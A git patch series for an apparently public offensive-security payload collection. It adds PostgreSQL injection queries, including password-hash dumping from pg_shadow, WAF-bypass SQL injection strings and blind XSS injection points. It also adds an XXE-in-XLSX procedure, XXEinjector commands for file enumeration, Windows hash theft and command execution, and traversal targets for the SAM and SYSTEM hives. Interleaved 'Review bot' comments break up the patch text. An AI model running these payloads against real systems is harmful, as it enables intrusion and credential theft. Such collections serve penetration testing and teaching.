From 525429c0d88d0ca968c02880868029e26f5175dc Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 26 Oct 2019 16:43:36 +0200 Subject: [PATCH 08/15] XPATH: add tools --- XPATH Injection/README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index 12bb05e..bcbe72e 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -7,6 +7,7 @@ * [Exploitation](#exploitation) * [Blind exploitation](#blind-exploitation) * [Out Of Band Exploitation](#out-of-band-exploitation) +* [Tools](#tools) * [References](#references) ## Exploitation @@ -47,8 +48,15 @@ x' or name()='username' or 'x'='y http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') ``` +## Tools + +- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents +- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool +- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text +- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer) +- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool + ## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) -* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) From 3dcd4425a87012f147fd1b995b7ed81debf7bb26 Mon Sep 17 00:00:00 2001 
From: nizam0906 Date: Mon, 28 Oct 2019 16:26:49 +0530 Subject: [PATCH 09/15] Added more PostgreSQL Injection Queries * PostgreSQL version * PostgreSQL Current User * PostgreSQL List Users * PostgreSQL List Password Hashes * PostgreSQL List Privileges * PostgreSQL database name * PostgreSQL List databases * PostgreSQL List tables * PostgreSQL List columns * PostgreSQL Stacked query --- SQL Injection/PostgreSQL Injection.md | 76 +++++++++++++++++++++++++++ 1 file changed, 76 insertions(+) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index b8d962d..d923c5a 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -3,9 +3,19 @@ ## Summary * [PostgreSQL Comments](#postgresql-comments) +* [PostgreSQL version](#postgresql-version) +* [PostgreSQL Current User](#postgresql-current-user) +* [PostgreSQL List Users](#postgresql-list-users) +* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) +* [PostgreSQL List Privileges](#postgresql-list-privileges) +* [PostgreSQL database name](#postgresql-database-name) +* [PostgreSQL List databases](#postgresql-list-database) +* [PostgreSQL List tables](#postgresql-list-tables) +* [PostgreSQL List columns](#postgresql-list-columns) * [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Time Based](#postgresql-time-based) +* [PostgreSQL Stacked query](#postgresql-stacked-query) * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) * [PostgreSQL Command execution](#postgresql-command-execution) 
@@ -20,6 +30,64 @@ /**/ ``` +## PostgreSQL Version + +```sql +SELECT version() +``` + +## PostgreSQL Current User + +```sql +SELECT user; +SELECT current_user; +SELECT session_user; +SELECT usename FROM pg_user; +SELECT getpgusername(); +``` + +## PostgreSQL List Users + +```sql +SELECT usename FROM pg_user +``` + +## PostgreSQL List Password Hashes + +```sql +SELECT usename, passwd FROM pg_shadow +``` + +## PostgreSQL List Privileges + +```sql +SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user +``` + +## PostgreSQL Database Name + +```sql +SELECT current_database() +``` + +## PostgreSQL List Database + +```sql +SELECT datname FROM pg_database +``` + +## PostgreSQL List Tables + +```sql +SELECT table_name FROM information_schema.tables +``` + +## PostgreSQL List Columns + +```sql +SELECT column_name FROM information_schema.columns WHERE table_name='data_table' +``` + ## PostgreSQL Error Based ```sql @@ -48,6 +116,14 @@ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ``` +## PostgreSQL Stacked Query + +Use a semi-colon ";" to add another query + +```sql +http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));-- +``` + ## PostgreSQL File Read ```sql From ab341cff384ffc2f218a54bf08b67f1beb850f36 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Mon, 28 Oct 2019 16:51:36 +0530 Subject: [PATCH 10/15] Updated Blind XSS endpoint * User Agent * Comment Box --- XSS Injection/README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index a0ccd8a..f8cac69 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md 
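Review bot: in the PostgreSQL List Password Hashes hunk, `SELECT usename, passwd FROM pg_shadow` needs superuser privileges (`pg_shadow` is readable only by superusers and `pg_user` masks the column), so say so beside the query. In the Current User block, `SELECT usename FROM pg_user` returns every role rather than the current one and is repeated verbatim as the List Users entry directly below; drop it from Current User. In the Summary hunk the entry reads "PostgreSQL List databases" while the heading it links to is "PostgreSQL List Database"; make the text match the heading. The Stacked Query block is fenced as `sql` but contains a URL, where `text` fits better, and "semi-colon" should be "semicolon".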
@@ -416,6 +416,12 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - Referer Header - Custom Site Analytics - Administrative Panel logs +- User Agent + - Custom Site Analytics + - Administrative Panel logs +- Comment Box + - Administrative Panel + ## Polyglot XSS From 135af74acda9b37a3febf14950dd0de91d923d9d Mon Sep 17 00:00:00 2001 From: duongdpt Date: Mon, 28 Oct 2019 22:26:28 +0700 Subject: [PATCH 11/15] Update README.md Add bypass waf using BETWEEN --- SQL Injection/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 8099f6d..8d5162b 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -440,12 +440,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` -No Equal - bypass using LIKE/NOT IN/IN +No Equal - bypass using LIKE/NOT IN/IN/BETWEEN ```sql ?id=1 and substring(version(),1,1)like(5) ?id=1 and substring(version(),1,1)not in(4,3) ?id=1 and substring(version(),1,1)in(4,3) +?id=1 and substring(version(),1,1) between 3 and 4 ``` Blacklist using keywords - bypass using uppercase/lowercase @@ -461,7 +462,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator ```sql AND -> && OR -> || -= -> LIKE,REGEXP, not < and not > += -> LIKE,REGEXP, BETWEEN, not < and not > > X -> not between 0 and X WHERE -> HAVING ``` From 5094ef8b108056199f3d84af782803e9ac4feeff Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 28 Oct 2019 20:46:19 +0100 Subject: [PATCH 12/15] XXE in XLSX --- XXE Injection/README.md | 52 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 5801717..b11ebd9 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
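Review bot: in the No Equal hunk, `?id=1 and substring(version(),1,1) between 3 and 4` is a range test rather than an equality test and, unlike the `like(5)` and `not in(4,3)` lines above it, evaluates false on a 5.x server, so a reader copying the block gets inconsistent results. Since the section is about replacing `=`, use `between 5 and 5` (BETWEEN with identical bounds is equality) to match the neighbouring lines, and in the operator table spell out that `BETWEEN X AND X` is the `=` equivalent.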
@@ -30,6 +30,7 @@ Syntax: `` - [XXE inside SVG](#xxe-inside-svg) - [XXE inside SOAP](#xxe-inside-soap) - [XXE inside DOCX file](#xxe-inside-docx-file) + - [XXE inside XLSX file](#xxe-inside-xlsx-file) ## Tools @@ -382,6 +383,56 @@ JPG (experimental) GIF (experimental) ``` +### XXE inside XLSX file + +Extract the excel file. + +```powershell +$ mkdir XXE && cd XXE +$ unzip ../XXE.xlsx +Archive: ../XXE.xlsx + inflating: xl/drawings/drawing1.xml + inflating: xl/worksheets/sheet1.xml + inflating: xl/worksheets/_rels/sheet1.xml.rels + inflating: xl/sharedStrings.xml + inflating: xl/styles.xml + inflating: xl/workbook.xml + inflating: xl/_rels/workbook.xml.rels + inflating: _rels/.rels + inflating: [Content_Types].xml +``` + +Add your blind XXE payload inside `xl/workbook.xml`. + +```powershell + + ]> +&xxe; + +``` + +Rebuild the Excel file. + +```powershell +$ zip -r ../poc.xslx * +updating: [Content_Types].xml (deflated 71%) +updating: _rels/ (stored 0%) +updating: _rels/.rels (deflated 60%) +updating: docProps/ (stored 0%) +updating: docProps/app.xml (deflated 51%) +updating: docProps/core.xml (deflated 50%) +updating: xl/ (stored 0%) +updating: xl/workbook.xml (deflated 56%) +updating: xl/worksheets/ (stored 0%) +updating: xl/worksheets/sheet1.xml (deflated 53%) +updating: xl/styles.xml (deflated 60%) +updating: xl/theme/ (stored 0%) +updating: xl/theme/theme1.xml (deflated 80%) +updating: xl/_rels/ (stored 0%) +updating: xl/_rels/workbook.xml.rels (deflated 66%) +updating: xl/sharedStrings.xml (deflated 17%) +``` + ## References 
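Review bot: `zip -r ../poc.xslx *` writes the archive with the extension `.xslx`; it should be `.xlsx`, otherwise the rebuilt file is not recognised as a workbook. The block under "Add your blind XXE payload inside `xl/workbook.xml`" shows only `]>` and `&xxe;`: the XML declaration, DOCTYPE and ENTITY lines are missing, so the step cannot be followed as written. Two smaller points: all three fences are tagged `powershell` although they hold shell output and XML, and the `unzip` listing (no `docProps/`, no `xl/theme/`) does not match the `zip` listing, so the two transcripts came from different files.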
@@ -403,3 +454,4 @@ GIF (experimental) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) +- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) \ No newline at end of file From 52119907f6c6dfac5c1662da865d602fbc14ae5b Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 29 Oct 2019 00:41:04 +0100 Subject: [PATCH 13/15] add XXEinjector --- XXE Injection/README.md | 28 ++++++++++++++++++++++++++-- 1 file changed, 26 insertions(+), 2 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b11ebd9..d4792dd 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
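Review bot: the new reference uses a `-` marker while the neighbouring entries use `*`, its title is in all capitals unlike the rest of the list, and the line lands without a trailing newline (`\ No newline at end of file`), which the following patch in this series then has to repair; normalise the marker and casing and end the file with a newline here.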
@@ -42,7 +42,31 @@ Syntax: `` ``` $ python3 230.py 2121 ``` - + - [XXEinjector](https://github.com/enjoiz/XXEinjector) + ```bash + # Enumerating /etc directory in HTTPS application: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl + # Enumerating /etc directory using gopher for OOB method: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher + # Second order exploitation: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt + # Bruteforcing files using HTTP out of band method and netdoc protocol: + ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc + # Enumerating using direct exploitation: + ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK + # Enumerating unfiltered ports: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all + # Stealing Windows hashes: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes + # Uploading files using Java jar: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf + # Executing system commands using PHP expect: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls + # Testing for XSLT injection: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt + # Log requests only: + ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt + ``` ## Detect the vulnerability 
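Review bot: every command references `--file=/tmp/req.txt` (and `--2ndfile`, `--brute`) without saying what those files must contain, so none of them can be run from this entry alone; add one line before the command list describing the expected input (a saved HTTP request and how the injection point is marked in it). Style: the block is fenced as ```bash while the sibling tool entries above it use untagged fences.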
@@ -454,4 +478,4 @@ updating: xl/sharedStrings.xml (deflated 17%) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) -- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) \ No newline at end of file +- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) From bb2c2471604761976445d54de2b4a936b034c1df Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 10:32:39 +0530 Subject: [PATCH 14/15] Added List Database Administrator Accounts SELECT datname FROM pg_database --- SQL Injection/PostgreSQL Injection.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index d923c5a..2bf952c 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -7,6 +7,7 @@ * [PostgreSQL Current User](#postgresql-current-user) * [PostgreSQL List Users](#postgresql-list-users) * [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) +* [PostgreSQL List Database Administrator Accounts](#postgresql-list-database-administrator-accounts) * [PostgreSQL List Privileges](#postgresql-list-privileges) * [PostgreSQL database name](#postgresql-database-name) * [PostgreSQL List databases](#postgresql-list-database) 
@@ -57,7 +58,10 @@ SELECT usename FROM pg_user ```sql SELECT usename, passwd FROM pg_shadow ``` - +## PostgreSQL List Database Administrator Accounts +```sql +SELECT usename FROM pg_user WHERE usesuper IS TRUE +``` ## PostgreSQL List Privileges ```sql From bb7e6b7cd0587903fc3040b3699f517fae02b2b0 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Tue, 29 Oct 2019 16:23:39 +0800 Subject: [PATCH 15/15] Update README.md --- Directory Traversal/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index 1420178..afa72bd 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -144,6 +144,8 @@ c:/unattend.txt c:/unattend.xml c:/unattended.txt c:/unattended.xml +c:/windows/repair/sam +c:/windows/repair/system ``` The following log files are controllable and can be included with an evil payload to achieve a command execution @@ -164,4 +166,4 @@ The following log files are controllable and can be included with an evil payloa ## References * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) -* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) \ No newline at end of file +* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
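Review bot: the hunk replaces the blank line after the `pg_shadow` fence with the new `## PostgreSQL List Database Administrator Accounts` heading and runs its closing fence straight into `## PostgreSQL List Privileges`; every other section in this file is separated by a blank line, so restore them around the new section. `SELECT usename FROM pg_user WHERE usesuper IS TRUE` is correct; `WHERE usesuper` alone would match the terseness of the other one-liners. The commit message quotes `SELECT datname FROM pg_database`, which is not the query this patch adds.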
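Review bot: `c:/windows/repair/sam` and `c:/windows/repair/system` are appended after `c:/unattended.xml`, but the surrounding entries are kept in alphabetical order (`c:/unattend.txt`, `c:/unattend.xml`, `c:/unattended.txt`, `c:/unattended.xml`), so the new paths belong further down with the other `c:/windows/...` entries. A short note that these are the backup copies of the SAM and SYSTEM registry hives would tell readers why their exposure matters, since the list gives no hint.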